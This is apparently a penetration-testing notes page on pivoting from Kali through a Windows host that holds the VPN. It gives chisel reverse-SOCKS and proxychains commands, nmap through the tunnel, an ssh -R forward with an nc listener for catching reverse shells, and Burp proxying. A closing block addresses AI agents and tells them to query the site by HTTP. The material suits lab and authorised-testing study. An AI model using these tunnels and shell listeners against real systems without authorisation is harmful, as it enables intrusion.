# Pivot in a Case

If you have a VPN to target machine, but just running in the windows machine, and you wanna attack from Kali Linux.

1. Fire up the windows and establish the VPN connection, make sure you can access the target machine.
2. Setup connection Host-Only connection between windows machine and kali machine. make sure you can communicate with kali machine.
3. Upload chisel.exe to the windows machine, and install chisel in the Kali.
4. Setup chisel server in the Kali Machine

```bash
chisel server -p 9090 --reverse
```

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2FH5hEYo39hFd3pIPZTvLt%2Fimage.png?alt=media&#x26;token=1c354b86-aba8-478a-bfc5-092b56bbdfd4" alt=""><figcaption></figcaption></figure>

5. Then connect to the chisel server with windows machine.

```
.\chisel.exe client <ip kali machine>:9090 R:socks
```

6. Set `/etc/proxychains.conf` with **socks5** proxy

<pre><code>[ProxyList]
socks5 127.0.0.1 <a data-footnote-ref href="#user-content-fn-1">1080</a>
</code></pre>

7. Test connection\ <mark style="color:red;">**Important**</mark>: *This connection will reproduce source IP in the packet with the windows ip, so you can't do ping, because Kali machine can't receive the ICMP packet. If you do nmap, always use `-Pn` for ignoring the ping to discover the machine.*

```bash
proxychains nmap -Pn <target machine behind the windows machine>
```

\
How to setup reverse shell?

ref: <https://www.youtube.com/watch?v=mOuqPROMmZc>

You need another forward proxy from windows machine to the kali machine.

there is 2 options based on the middle machine.\
Linux Machine & have ssh

```
ssh -R <middle machine IP>:<port>:127.0.0.1:<listen port> user_middle@<middle machine IP>
ssh -R <middle machine IP>:443:127.0.0.1:8080 user_middle@<middle machine IP>
```

Your reverse shell:

```
host:<middle machine IP>
port: 443
```

netcat listening shell:

```
nc -lvnp 8080
```

How about setting up your burpsuite?

ref: <https://www.youtube.com/watch?v=Q5ujOEXGOo8>

requirement:\
1\. tunnel connection with `socks5 127.0.0.1 9666` --> use chisel above

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2Fw4WYUwQffgvf7QWhkDxe%2Fimage.png?alt=media&#x26;token=23bed077-4a2d-43f3-985f-a60affae79e5" alt=""><figcaption></figcaption></figure>

2. Set your browser proxy to burp proxy
3. Just let it go :D

[^1]: appear from chisel server


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacker-mind.gitbook.io/hacker-mind/post-exploit/pivoting/pivot-in-a-case.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.